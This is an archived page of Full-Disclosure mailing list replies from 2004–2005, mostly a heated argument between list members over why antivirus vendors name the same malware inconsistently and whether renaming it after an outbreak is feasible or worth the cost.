Mailing List Archive: Full Disclosure: Full-Disclosure

(no subject)

1 2 3 4 5 6 7 8

View All

Full Disclosure full-disclosure RSS feed

Index | Next | Previous | View Threaded

kf_lists at secnetops

Aug 13, 2004, 4:04 PM

Post #101 of 180 (2712 views)
Permalink

Re: (no subject) (try using a friggin subject line...) [In reply to]

Insert subject here --------------------^

-KF

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Valdis.Kletnieks at vt

Aug 13, 2004, 5:52 PM

Post #102 of 180 (2711 views)
Permalink

Re: (no subject) [In reply to]

On Fri, 13 Aug 2004 21:17:44 +0200, Maarten said:

> The only thing Todd (and I) are trying to say is that it is possible to rename
> after the fact. I don't #!%$&* care how many old Cobol programs need
> adapting for that to "get" possible, but the fact remains that it IS.

The question is *in fact* what ROI the companies get for modifying all that
old Cobol. "Possible" and "worth doing" are two different things...

> Don't start again about how your current procedures may prevent or complicate
> that. Worse integration problems, by far more complex and bigger companies
> or conglomerates are being tackled every day. Yeah. To name a few ?

Note that here the ROI is pretty easy - you fix the compatibility or the company
goes under.

> How about mergers, or international intelligence-exchange between law
> enforcement agencies. Do you think that they let anyone stop them by
> complaining that database format X isn't readily compatible with format Y ?
> No. They fix it, they make it work together no matter what.

Actually, that isn't always the case.

http://www.publicintegrity.org/report.aspx?aid=332&sid=100

Yes, a database so borked that copying it could break it.

> So don't start about how impossible it is for you to rename one simple entry.

It's not a question of being *impossible*. But if it costs them US$750K to do it,
and the expected return is under US$750K, why should they do it?

Hell, we're talking about an industry which as a whole *continues* to keep
spewing out 'We removed a virus/worm' warnings to known not-at-fault addresses
- presumably the (probably very low) cost of ceasing to do so is
counterbalanced by the advertising benefit of the spam. If they won't do *THAT*
little thing that's *obviously* in the public interest, why should they change
the way they name stuff, at probably higher cost, and less obvious benefit?

fulldisc at ultratux

Aug 13, 2004, 6:35 PM

Post #103 of 180 (2706 views)
Permalink

Re: (no subject) [In reply to]

On Saturday 14 August 2004 02:52, Valdis.Kletnieks [at] vt wrote:
> On Fri, 13 Aug 2004 21:17:44 +0200, Maarten said:
> > The only thing Todd (and I) are trying to say is that it is possible to
> > rename after the fact. I don't #!%$&* care how many old Cobol programs
> > need adapting for that to "get" possible, but the fact remains that it
> > IS.
>
> The question is *in fact* what ROI the companies get for modifying all that
> old Cobol. "Possible" and "worth doing" are two different things...

Oh definitely. I do not contest that. But these posts saying "not possible"
from a technical / logistical standpoint started to irritate me...
But sure, until there is an economic reason for change, there won't be.

> > How about mergers, or international intelligence-exchange between law
> > enforcement agencies. Do you think that they let anyone stop them by
> > complaining that database format X isn't readily compatible with format Y
> > ? No. They fix it, they make it work together no matter what.
>
> Actually, that isn't always the case.
>
> http://www.publicintegrity.org/report.aspx?aid=332&sid=100
>
> Yes, a database so borked that copying it could break it.

Hahaha. Great link, thanks... Although this may happen, it sounds to me like
a political issue rather than a technical one. When you can retrieve data
you can copy it (by however [inefficient] means is irrelevant now).

> Hell, we're talking about an industry which as a whole *continues* to keep
> spewing out 'We removed a virus/worm' warnings to known not-at-fault
> addresses - presumably the (probably very low) cost of ceasing to do so is
> counterbalanced by the advertising benefit of the spam. If they won't do
> *THAT* little thing that's *obviously* in the public interest, why should
> they change the way they name stuff, at probably higher cost, and less
> obvious benefit?

Hear hear...!
Good point.

Maarten

--
Yes of course I'm sure it's the red cable. I guarante[^%!/+)F#0c|'NO CARRIER

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

nick at virus-l

Aug 14, 2004, 12:14 AM

Post #104 of 180 (2701 views)
Permalink

RE: (no subject) [In reply to]

Brad Griffin wrote:

<<big snip>>
> I can't understand how the Google research is a problem with naming
> conventions. Google for a virus name and multiple hits come up, mostly
> for descriptions on a/v sites that also carry the alias names in most
> cases.

The "problem" with such "Google research" (or with using VGrep) is that
it is too much "after the event".

As I keep saying, and as admins everywhere keep agreeing with me, the
biggest part of the naming inconsistency problem occurs in the first
few hours of an outbreak (or suspected outbreak) event. Neither Google
nor VGrep can help you then...

Some AV developers have taken more care to list the names they know
their competitors are using by the time they post a web description of
a new virus, and some make the effort to update that list for the hours
or days following an outbreak, at least for "high interest" viruses but
that is only a partial solution to the problem.

--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

adam at huntrecruiting

Aug 14, 2004, 7:35 PM

Post #105 of 180 (2703 views)
Permalink

Re: (no subject) (try using a friggin subject line...) [In reply to]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

who are you friggen Dr Evil?

On Friday 13 August 2004 07:04 pm, KF_lists wrote:
> Insert subject here --------------------^
>
> -KF
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBHsvzQEDQWvlbVLkRAls1AJ9il79zClgYJinxFJrZFILdbw6v7QCeLhQa
12Xv/+oYjPxty8GdJmRqGHw=
=kKb6
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

adam at huntrecruiting

Aug 14, 2004, 7:35 PM

Post #106 of 180 (2693 views)
Permalink

Re: (no subject) (try using a friggin subject line...) [In reply to]

nick at virus-l

Aug 14, 2004, 7:52 PM

Post #107 of 180 (2710 views)
Permalink

Re: (no subject) [In reply to]

Maarten wrote:

> First off: Nick, please lose that damn attitude of yours !

Why?

You're clearly ignorant of what you are talking about, yet you speak
with an air as if you do know something about the topic. Further, your
ignorance would have been cured by carefully reading all of the
foregoing thread. There's a point where the idiocy and chutzpah that
several have shown in this thread makes them no longer worthy of polite
consideration and at that point I usually adopt the "beat it into them
in case that helps" approach...

> Further, by hammering on the endless we-have-done-it-for-many-years-so-who
> are-you-to-tell-us-differently part you're actually making yourself part of
> the problem, not part of the solution.

You show more and more of your ignorance each time you open your mouth.

_If_ this "problem" is ever solved, it is very likely that I will have
been a not insignificant part of that solution. I can't prove that to
you but it is "just one of those things" and probably undeniable to
anyone who knows what they are talking about when discussing this
problem.

> You're saying that internal procedures make it so difficult to adapt names
> after the fact. When in fact the strength of a company, any company, IS to
> be able to adapt to changing circumstances.
> And if they're not able to, eventually they will go the way of the dinosaurs.

You are confusing two different aspects of the AV industry. Yes, the
industry has to be quite flexible and able to quickly react to
significant shifts in the malware detection problem set. That does not
mean it has to be equally flexible (or even "flexible in the tiniest
little bit") when it comes to malware naming, as the last 15 years of
commercial AV software development, marketing and sales prove. Your
suggestion is found wanting in the light of significant history -- care
to make some more obviously uninformed comments??

> The only thing Todd (and I) are trying to say is that it is possible to rename
> after the fact. ...

Of course it is.

I never denied that.

I have, however, pointed out several reasons why that generally doesn't
happen, why that situation is very unlikely to change _AND_ why it
would not be particularly helpful even if it did change. In response
to those explanations you and Todd (and some others) just keep dumbly
repeating "but they should change".

Something we both agree on.

The difference is that in designing a better naming system, I am not
limited to parrotting stupid inanities about things I don't understand
-- I can analyse the history in multi-layered and interacting terms of
the industry's technical, economic and political development, its
current internal culture, place that in larger market and political
contexts, and as a result make useful suggestions that are much more
likely to be adopted inside the industry and that mean the industry can
change to better suit those external factors. I can also advise those
"outside" AV what elements of those environments they may best and most
easily change to increase the likelihood the AV industry will make
"suitable" changes.

I await your parrot squawk response...

NOT!

> ... I don't #!%$&* care how many old Cobol programs need
> adapting for that to "get" possible, but the fact remains that it IS.

_Theoretically_, yes.

I have now lost track of how many times I have agreed with you (and
others) on this now.

The larger and much more salient fact is that, in today's market (and
everything that has gone before it), there is no compelling reason for
several of the very large players to make the expenditure and introduce
the huge upheavals to internal processes (that are clearly working
because these companies have not gone the way of the dinosaurs and, to
the contrary, are experiencing some of their strongest growth ever)
that fixing the naming problem will require.

> Don't start again about how your current procedures may prevent or complicate
> that. Worse integration problems, by far more complex and bigger companies
> or conglomerates are being tackled every day. Yeah. To name a few ?
> How about mergers, or international intelligence-exchange between law
> enforcement agencies. Do you think that they let anyone stop them by
> complaining that database format X isn't readily compatible with format Y ?
> No. They fix it, they make it work together no matter what.
> So don't start about how impossible it is for you to rename one simple entry.

Both your belief in, and your abject inability to see, your own
ignorance are truly astonishing!

As Valdis (?) has already addressed the most egregious flaws of your
"logic" here, I'll move on other, more AV-specific issues.

> To conclude, I'd like to put serious question marks by your statement that the
> first few hours are the all-important ones. First off, by renaming after the
> fact (after the first few hours/days/weeks) no-one is changing ANYTHING about
> those first hours so you shouldn't have ANY complaint regarding that.

Huh???

What _are_ you trying to say?

The first few hours _under current processes_ produce nearly all of the
confusion caused by naming inconsistencies. Media outlets latch onto
the multiple names (though some will only report one of these, at least
initially). System admins get multiple reports and warnings of new
outbreaks and have to work out whether the updates from the three (or
more) different AV suppliers whose products they use all cover "all" of
the new viruses (which may only be one, but the admins don't know yet).
Then, after the initial hub-bub dies down, the way all the foregoing
works produces a (modest to significant) negative pressure on the AV
companies to change the name reported by their scanner -- they have
sent out alerts to system admins with their initial name and as
confusing as it was at the time that this was not the same name as some
of the competition used the admins of their scanners have become
somewhat familiar with that name, the major news agencies all included
that company's name for the malware in their reports so folk will come
looking for that name at their web site, and so on. Those everyday
(well, every incident) negative pressures for name change further
reduce any perceived ROI of changing the processes that would allow for
much greater naming flexibility (when viewed as a business issue,
rather than as a theoretical or technical one).

> Secondly, a lot of the confusion only comes later. The guys that have their AV
> software up and running and current mostly do not suffer from the outbreaks.
> The problem often comes (much) later, with the people who didn't update,
> 'forgot to', or plain disregard any security or updates whatsoever. And then
> you are only called in to fix things when stuff is really breaking down.
> Or are you saying you've never been asked to de-toxify your parents'-,
> friends'- or siblings'- computers that got infested despite everything ?
> Everyone has.

I did not say that there were not downstream problems as a result of
not renaming. I said the majority of the cost (as a business factor)
of naming inconsistency occurs in the first few hours of an "outbreak"
situation, either directly (e.g. the sysadmins rushing round trying to
work out if the three alerts from three different vendors in the last
15 minutes for FooBar.AB, FooBar.AC and FooBar.AD are, in fact, just
different names for one virus or two or three new variants they then
have to ensure all their products get updated to detect ASAP) or
indirectly (the media reports start to be written as the developers
post alerts to sysadmins, and these promulgate _and preserve_ further
confusion based on the mish-mash of names from early in an outbreak,
and worse, can add their own cutesy, media-coined names to further mess
things up).

Those are the reasons why renaming after the event will not
significantly reduce the costs and complications of naming confusion.

Before you respond Maarten, please re-read the whole thread again to
see how many times this has already been explained... (Note that I
consider this and the parallel thread on naming conventions to be part
of the same thread.)

> Oh and P.S.: Yes, I did read all of the threads pertaining to this.

It's a pity you didn't understand what you read then, as you have
presented no good arguments against the points I have now made several
times, and mostly you simply regurgitate the clue-free comments that
you have already made.

I am now very tired of repeating myself and having you and some others
fail to grasp the slightest bit of what I have been explaining. If all
you do is repeat yourself again I shall most likely just ignore you, as
I have better things to do with my time than beat my head against the
block wall of your ignorance.

--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

list at geeksamazing

Aug 14, 2004, 11:15 PM

Post #108 of 180 (2716 views)
Permalink

Re: (no subject) [In reply to]

Nick et al...

After having really suffered the thread(S) what is missing is.

Most SysAdmins do not know what it takes to run a business.

Most Business Administrators do not know what it takes to run a
network.

With that said Maarten will never understand the Business Point that you
are making, nor will most other SysAdmins.

The bottom line is no matter how many "technical" people would like it or
it would actually make Sense AND make Everyone's lives easier. The bean
counters prevent it, there is no Profit.

At 02:52 PM 8/15/2004 +1200, Nick FitzGerald wrote:
>Maarten wrote:
>
> > First off: Nick, please lose that damn attitude of yours !
>
>Why?
>
>You're clearly ignorant of what you are talking about, yet you speak
>with an air as if you do know something about the topic. Further, your
>ignorance would have been cured by carefully reading all of the
>foregoing thread. There's a point where the idiocy and chutzpah that
>several have shown in this thread makes them no longer worthy of polite
>consideration and at that point I usually adopt the "beat it into them
>in case that helps" approach...
>
> > Further, by hammering on the endless we-have-done-it-for-many-years-so-who
> > are-you-to-tell-us-differently part you're actually making yourself
> part of
> > the problem, not part of the solution.
>
>You show more and more of your ignorance each time you open your mouth.
>
>_If_ this "problem" is ever solved, it is very likely that I will have
>been a not insignificant part of that solution. I can't prove that to
>you but it is "just one of those things" and probably undeniable to
>anyone who knows what they are talking about when discussing this
>problem.
>
> > You're saying that internal procedures make it so difficult to adapt names
> > after the fact. When in fact the strength of a company, any company,
> IS to
> > be able to adapt to changing circumstances.
> > And if they're not able to, eventually they will go the way of the
> dinosaurs.
>
>You are confusing two different aspects of the AV industry. Yes, the
>industry has to be quite flexible and able to quickly react to
>significant shifts in the malware detection problem set. That does not
>mean it has to be equally flexible (or even "flexible in the tiniest
>little bit") when it comes to malware naming, as the last 15 years of
>commercial AV software development, marketing and sales prove. Your
>suggestion is found wanting in the light of significant history -- care
>to make some more obviously uninformed comments??
>
> > The only thing Todd (and I) are trying to say is that it is possible to
> rename
> > after the fact. ...
>
>Of course it is.
>
>I never denied that.
>
>I have, however, pointed out several reasons why that generally doesn't
>happen, why that situation is very unlikely to change _AND_ why it
>would not be particularly helpful even if it did change. In response
>to those explanations you and Todd (and some others) just keep dumbly
>repeating "but they should change".
>
>Something we both agree on.
>
>The difference is that in designing a better naming system, I am not
>limited to parrotting stupid inanities about things I don't understand
>-- I can analyse the history in multi-layered and interacting terms of
>the industry's technical, economic and political development, its
>current internal culture, place that in larger market and political
>contexts, and as a result make useful suggestions that are much more
>likely to be adopted inside the industry and that mean the industry can
>change to better suit those external factors. I can also advise those
>"outside" AV what elements of those environments they may best and most
>easily change to increase the likelihood the AV industry will make
>"suitable" changes.
>
>I await your parrot squawk response...
>
>NOT!
>
> > ... I don't #!%$&* care how many old Cobol programs need
> > adapting for that to "get" possible, but the fact remains that it IS.
>
>_Theoretically_, yes.
>
>I have now lost track of how many times I have agreed with you (and
>others) on this now.
>
>The larger and much more salient fact is that, in today's market (and
>everything that has gone before it), there is no compelling reason for
>several of the very large players to make the expenditure and introduce
>the huge upheavals to internal processes (that are clearly working
>because these companies have not gone the way of the dinosaurs and, to
>the contrary, are experiencing some of their strongest growth ever)
>that fixing the naming problem will require.
>
> > Don't start again about how your current procedures may prevent or
> complicate
> > that. Worse integration problems, by far more complex and bigger
> companies
> > or conglomerates are being tackled every day. Yeah. To name a few ?
> > How about mergers, or international intelligence-exchange between law
> > enforcement agencies. Do you think that they let anyone stop them by
> > complaining that database format X isn't readily compatible with format
> Y ?
> > No. They fix it, they make it work together no matter what.
> > So don't start about how impossible it is for you to rename one simple
> entry.
>
>Both your belief in, and your abject inability to see, your own
>ignorance are truly astonishing!
>
>As Valdis (?) has already addressed the most egregious flaws of your
>"logic" here, I'll move on other, more AV-specific issues.
>
> > To conclude, I'd like to put serious question marks by your statement
> that the
> > first few hours are the all-important ones. First off, by renaming
> after the
> > fact (after the first few hours/days/weeks) no-one is changing ANYTHING
> about
> > those first hours so you shouldn't have ANY complaint regarding that.
>
>Huh???
>
>What _are_ you trying to say?
>
>The first few hours _under current processes_ produce nearly all of the
>confusion caused by naming inconsistencies. Media outlets latch onto
>the multiple names (though some will only report one of these, at least
>initially). System admins get multiple reports and warnings of new
>outbreaks and have to work out whether the updates from the three (or
>more) different AV suppliers whose products they use all cover "all" of
>the new viruses (which may only be one, but the admins don't know yet).
>Then, after the initial hub-bub dies down, the way all the foregoing
>works produces a (modest to significant) negative pressure on the AV
>companies to change the name reported by their scanner -- they have
>sent out alerts to system admins with their initial name and as
>confusing as it was at the time that this was not the same name as some
>of the competition used the admins of their scanners have become
>somewhat familiar with that name, the major news agencies all included
>that company's name for the malware in their reports so folk will come
>looking for that name at their web site, and so on. Those everyday
>(well, every incident) negative pressures for name change further
>reduce any perceived ROI of changing the processes that would allow for
>much greater naming flexibility (when viewed as a business issue,
>rather than as a theoretical or technical one).
>
> > Secondly, a lot of the confusion only comes later. The guys that have
> their AV
> > software up and running and current mostly do not suffer from the
> outbreaks.
> > The problem often comes (much) later, with the people who didn't update,
> > 'forgot to', or plain disregard any security or updates
> whatsoever. And then
> > you are only called in to fix things when stuff is really breaking down.
> > Or are you saying you've never been asked to de-toxify your parents'-,
> > friends'- or siblings'- computers that got infested despite everything ?
> > Everyone has.
>
>I did not say that there were not downstream problems as a result of
>not renaming. I said the majority of the cost (as a business factor)
>of naming inconsistency occurs in the first few hours of an "outbreak"
>situation, either directly (e.g. the sysadmins rushing round trying to
>work out if the three alerts from three different vendors in the last
>15 minutes for FooBar.AB, FooBar.AC and FooBar.AD are, in fact, just
>different names for one virus or two or three new variants they then
>have to ensure all their products get updated to detect ASAP) or
>indirectly (the media reports start to be written as the developers
>post alerts to sysadmins, and these promulgate _and preserve_ further
>confusion based on the mish-mash of names from early in an outbreak,
>and worse, can add their own cutesy, media-coined names to further mess
>things up).
>
>Those are the reasons why renaming after the event will not
>significantly reduce the costs and complications of naming confusion.
>
>Before you respond Maarten, please re-read the whole thread again to
>see how many times this has already been explained... (Note that I
>consider this and the parallel thread on naming conventions to be part
>of the same thread.)
>
> > Oh and P.S.: Yes, I did read all of the threads pertaining to this.
>
>It's a pity you didn't understand what you read then, as you have
>presented no good arguments against the points I have now made several
>times, and mostly you simply regurgitate the clue-free comments that
>you have already made.
>
>I am now very tired of repeating myself and having you and some others
>fail to grasp the slightest bit of what I have been explaining. If all
>you do is repeat yourself again I shall most likely just ignore you, as
>I have better things to do with my time than beat my head against the
>block wall of your ignorance.
>
>
>--
>Nick FitzGerald
>Computer Virus Consulting Ltd.
>Ph/FAX: +64 3 3529854
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

fulldisc at ultratux

Aug 15, 2004, 4:52 AM

Post #109 of 180 (2725 views)
Permalink

Re: (no subject) [In reply to]

On Sunday 15 August 2004 04:52, Nick FitzGerald wrote:
> Maarten wrote:
> > First off: Nick, please lose that damn attitude of yours !
>
> Why?

Because you're being rude, and anti-social. You don't score points with this.
Jeez why do I even HAVE to explain things like this. SO typical.

> You're clearly ignorant of what you are talking about, yet you speak
> with an air as if you do know something about the topic. Further, your
> ignorance would have been cured by carefully reading all of the
> foregoing thread. There's a point where the idiocy and chutzpah that
> several have shown in this thread makes them no longer worthy of polite
> consideration and at that point I usually adopt the "beat it into them
> in case that helps" approach...

yada yada. You may work in the industry (and be blind because of it) and I
may have an incredible high IQ (so much higher than yours that you perceive
I'm stupid instead).
But the thing is, you don't know that. So stop bashing me and showing off.
You can shine by your actions, not by your reputation...

> > Further, by hammering on the endless
> > we-have-done-it-for-many-years-so-who are-you-to-tell-us-differently part
> > you're actually making yourself part of the problem, not part of the
> > solution.
>
> You show more and more of your ignorance each time you open your mouth.

You ARE part of the problem ! You leave no opportunity unused to bash
opponents instead of using solid arguments.

> _If_ this "problem" is ever solved, it is very likely that I will have
> been a not insignificant part of that solution. I can't prove that to
> you but it is "just one of those things" and probably undeniable to
> anyone who knows what they are talking about when discussing this
> problem.

Which coincidentally, by your own admission, would be only you.
So you're effectively saying: "I will probably agree with myself."
Well, whoopty-doo... big surprise there.

> > You're saying that internal procedures make it so difficult to adapt
> > names after the fact. When in fact the strength of a company, any
> > company, IS to be able to adapt to changing circumstances.
> > And if they're not able to, eventually they will go the way of the
> > dinosaurs.
>
> You are confusing two different aspects of the AV industry. Yes, the
> industry has to be quite flexible and able to quickly react to
> significant shifts in the malware detection problem set. That does not
> mean it has to be equally flexible (or even "flexible in the tiniest
> little bit") when it comes to malware naming, as the last 15 years of
> commercial AV software development, marketing and sales prove. Your
> suggestion is found wanting in the light of significant history -- care
> to make some more obviously uninformed comments??

I'm not confusing anything. The statement about needing to be flexible
applies to ALL companies, on ALL aspects. It is stupid to think that a
company can be inflexible in one thing while being flexible in another.

> > The only thing Todd (and I) are trying to say is that it is possible to
> > rename after the fact. ...
>
> Of course it is.
>
> I never denied that.

Yes, you did.

> I have, however, pointed out several reasons why that generally doesn't
> happen, why that situation is very unlikely to change _AND_ why it
> would not be particularly helpful even if it did change. In response
> to those explanations you and Todd (and some others) just keep dumbly
> repeating "but they should change".
>
> Something we both agree on.
>
> The difference is that in designing a better naming system, I am not
> limited to parrotting stupid inanities about things I don't understand
> -- I can analyse the history in multi-layered and interacting terms of
> the industry's technical, economic and political development, its
> current internal culture, place that in larger market and political
> contexts, and as a result make useful suggestions that are much more
> likely to be adopted inside the industry and that mean the industry can
> change to better suit those external factors. I can also advise those
> "outside" AV what elements of those environments they may best and most
> easily change to increase the likelihood the AV industry will make
> "suitable" changes.

No, you're a shining example of being too close to your subject to have an
impartial and unclouded view.

> I await your parrot squawk response...
>
> NOT!

I'm happy to say I don't care whether you await it or not.

> > ... I don't #!%$&* care how many old Cobol programs need
> > adapting for that to "get" possible, but the fact remains that it IS.
>
> _Theoretically_, yes.
>
> I have now lost track of how many times I have agreed with you (and
> others) on this now.
>
> The larger and much more salient fact is that, in today's market (and
> everything that has gone before it), there is no compelling reason for
> several of the very large players to make the expenditure and introduce
> the huge upheavals to internal processes (that are clearly working
> because these companies have not gone the way of the dinosaurs and, to
> the contrary, are experiencing some of their strongest growth ever)
> that fixing the naming problem will require.

All change starts small. Maybe discussions such a this will wake people up,
maybe there will even be a voiced demand from the public. That DOES hurt
sales, thus shareholders, which is what you need to have done, right ?
The only thing I'm sure about is, YOU will not be instrumental in this.

> > Don't start again about how your current procedures may prevent or
> > complicate that. Worse integration problems, by far more complex and
> > bigger companies or conglomerates are being tackled every day. Yeah. To
> > name a few ? How about mergers, or international intelligence-exchange
> > between law enforcement agencies. Do you think that they let anyone stop
> > them by complaining that database format X isn't readily compatible with
> > format Y ? No. They fix it, they make it work together no matter what.
> > So don't start about how impossible it is for you to rename one simple
> > entry.
>
> Both your belief in, and your abject inability to see, your own
> ignorance are truly astonishing!

Saying someone is ignorant without proving that only makes yourself look
stupid.

> As Valdis (?) has already addressed the most egregious flaws of your
> "logic" here, I'll move on other, more AV-specific issues.

Valdis only mentioned economics. We agree on the economic situation.
But you're not focussing on that AT ALL. You are saying there are technical
reasons not to. Like the next point, which I'll -sigh- explain to you again.

> > To conclude, I'd like to put serious question marks by your statement
> > that the first few hours are the all-important ones. First off, by
> > renaming after the fact (after the first few hours/days/weeks) no-one is
> > changing ANYTHING about those first hours so you shouldn't have ANY
> > complaint regarding that.
>
> Huh???
>
> What _are_ you trying to say?

Well, just for you, to make it simple.
At Time T you find a virus and name it whatever you like (just as you do now).
From time T until T+48h you have the "all-important hours" of confusion as
you are so adamant to repeat at every opportunity. So let there be confusion.
At Time T+50 you agree upon a singular standardized name and rename it.

So, compared to now, what has changed between T and T+48 ?? Nothing. So stop
complaining about me messing up those "all-important hours" of yours. I'm
not messing anything up. I'm renaming when the panic has died down.
Get it now ?!?!

>
> The first few hours _under current processes_ produce nearly all of the
> confusion caused by naming inconsistencies. Media outlets latch onto

This is not a scientific fact, and I do not agree with you.

> the multiple names (though some will only report one of these, at least
> initially). System admins get multiple reports and warnings of new
> outbreaks and have to work out whether the updates from the three (or
> more) different AV suppliers whose products they use all cover "all" of
> the new viruses (which may only be one, but the admins don't know yet).
> Then, after the initial hub-bub dies down, the way all the foregoing
> works produces a (modest to significant) negative pressure on the AV
> companies to change the name reported by their scanner -- they have
> sent out alerts to system admins with their initial name and as
> confusing as it was at the time that this was not the same name as some
> of the competition used the admins of their scanners have become
> somewhat familiar with that name, the major news agencies all included
> that company's name for the malware in their reports so folk will come
> looking for that name at their web site, and so on. Those everyday
> (well, every incident) negative pressures for name change further
> reduce any perceived ROI of changing the processes that would allow for
> much greater naming flexibility (when viewed as a business issue,
> rather than as a theoretical or technical one).

Are you thick ? Of course they will not "further reduce" that. If anything,
increase it. Negative press hurts the bottom line, or does your special
universe work differently ?

> > Secondly, a lot of the confusion only comes later. The guys that have
> > their AV software up and running and current mostly do not suffer from
> > the outbreaks. The problem often comes (much) later, with the people who
> > didn't update, 'forgot to', or plain disregard any security or updates
> > whatsoever. And then you are only called in to fix things when stuff is
> > really breaking down. Or are you saying you've never been asked to
> > de-toxify your parents'-, friends'- or siblings'- computers that got
> > infested despite everything ? Everyone has.
>
> I did not say that there were not downstream problems as a result of
> not renaming. I said the majority of the cost (as a business factor)
> of naming inconsistency occurs in the first few hours of an "outbreak"
> situation, either directly (e.g. the sysadmins rushing round trying to
> work out if the three alerts from three different vendors in the last
> 15 minutes for FooBar.AB, FooBar.AC and FooBar.AD are, in fact, just
> different names for one virus or two or three new variants they then
> have to ensure all their products get updated to detect ASAP) or
> indirectly (the media reports start to be written as the developers
> post alerts to sysadmins, and these promulgate _and preserve_ further
> confusion based on the mish-mash of names from early in an outbreak,
> and worse, can add their own cutesy, media-coined names to further mess
> things up).

This comes at a significant cost to the AV company too: when not renaming,
they still have to compare their viruses found to all the competitors' ones,
if only to be able to update their description pages.

But there is another glaring hole in your whole approach. On the one hand you
say that those early hours are the problem, yet you keep saying you're
categorically refusing to tackle that, in earlier posts. So are you part of
the problem, or not ?

> Those are the reasons why renaming after the event will not
> significantly reduce the costs and complications of naming confusion.
>
> Before you respond Maarten, please re-read the whole thread again to
> see how many times this has already been explained... (Note that I
> consider this and the parallel thread on naming conventions to be part
> of the same thread.)

I do too. Please get it into your thick head that it IS conceivable that
someone not agreeing with you != someone is wrong. The world doesn't
revolve around you and your views, you know.

> > Oh and P.S.: Yes, I did read all of the threads pertaining to this.
>
> It's a pity you didn't understand what you read then, as you have
> presented no good arguments against the points I have now made several
> times, and mostly you simply regurgitate the clue-free comments that
> you have already made.

If there is someone who's endlessly repeating himself, it is you.

> I am now very tired of repeating myself and having you and some others
> fail to grasp the slightest bit of what I have been explaining. If all
> you do is repeat yourself again I shall most likely just ignore you, as
> I have better things to do with my time than beat my head against the
> block wall of your ignorance.

Funny, I thought the exact same thing myself. So we'll probably stop this
discussion that is going nowhere anyway. Have a nice life the the AV
research industry. And when (not if, when) the time comes that y'all DO
agree on fixing the naming problem, maybe you'll think of me for a second.
Okay ?

Maarten

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

lists at michel-messerschmidt

Aug 16, 2004, 3:50 AM

Post #110 of 180 (2720 views)
Permalink

Re: (no subject) [In reply to]

On Sun, Aug 15, 2004 at 01:52:33PM +0200, Maarten wrote:
> On Sunday 15 August 2004 04:52, Nick FitzGerald wrote:
> > Maarten wrote:
> yada yada. You may work in the industry (and be blind because of it) and I
> may have an incredible high IQ (so much higher than yours that you perceive
> I'm stupid instead).
> But the thing is, you don't know that. So stop bashing me and showing off.
> You can shine by your actions, not by your reputation...

So what is your knowledge about malware naming ?
You know about the wildlist and its problems, Vgrep, CARO, 'naming.txt'
and its use in the last 10 years ?
You have ever tried to maintain and work with a malware collection ?
You know about previous (and more in-depth) discussions on this topic ?
You've read at least http://www.securityfocus.com/infocus/1587
and http://www.virusbtn.com/magazine/archives/200301/caro.xml
to get a basic idea of the problem ?
So what rational fact makes you believe you know this better than everyone
else ?

> All change starts small. Maybe discussions such a this will wake people up,
> maybe there will even be a voiced demand from the public. That DOES hurt
> sales, thus shareholders, which is what you need to have done, right ?
> The only thing I'm sure about is, YOU will not be instrumental in this.

Do you really think, there were any new ideas here ?
For an example, here at the antiVirusTestCenter we have discussed the naming
problems for years. But even the partial solutions that have been realized
(LOKMM, VMacro-Server) haven't caused significant changes. And this was in
cooperation with many AV researchers.
How should such an annoying thread like this really help ? Do you also
believe you can convince MS to make Windows OpenSource just by posting here ?

> Well, just for you, to make it simple.
> At Time T you find a virus and name it whatever you like (just as you do now).
> >From time T until T+48h you have the "all-important hours" of confusion as
> you are so adamant to repeat at every opportunity. So let there be confusion.
> At Time T+50 you agree upon a singular standardized name and rename it.
>
> So, compared to now, what has changed between T and T+48 ?? Nothing. So stop
> complaining about me messing up those "all-important hours" of yours. I'm
> not messing anything up. I'm renaming when the panic has died down.
> Get it now ?!?!

And what is the benefit of your proposal? Have you considered that it may
be just another source of confusion ? There could be uncoordinated
renamings, the same malware alerts with old and new names (but this time
from the same vendor). Adminstrators may not be able to compare scan reports
from different malware definition updates because the names changed in
between.

> > The first few hours _under current processes_ produce nearly all of the
> > confusion caused by naming inconsistencies. Media outlets latch onto
>
> This is not a scientific fact, and I do not agree with you.

I can't remember _any_ scientific fact in this thread.

--
Michel Messerschmidt lists [at] michel-messerschmidt
antiVirusTestCenter, Computer Science, University of Hamburg

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

kf_lists at secnetops

Sep 3, 2004, 12:35 PM

Post #111 of 180 (2700 views)
Permalink

Re: (no subject) (try using a friggin subject line...) [In reply to]

I'm Rick James bitch!
-KF

Adam wrote:
>
> who are you friggen Dr Evil?
>
> On Friday 13 August 2004 07:04 pm, KF_lists wrote:
>
>>>Insert subject here --------------------^
>>>
>>>-KF
>>>
>>>_______________________________________________
>>>Full-Disclosure - We believe in it.
>>>Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

d4yj4y at yahoo

Apr 26, 2005, 2:57 PM

Post #112 of 180 (2713 views)
Permalink

Re: (no subject) [In reply to]

Man, ppl are such crybabies!

--- Paul Schmehl <pauls [at] utdallas> wrote:
> --On Tuesday, April 26, 2005 03:05:29 PM -0400 Stan
> Bubrouski
> <stan.bubrouski [at] gmail> wrote:
>
> > Could we can the nazi rhetoric in messages on this
> list? Or can we just
> > complain until the list
> > loses its hosting?
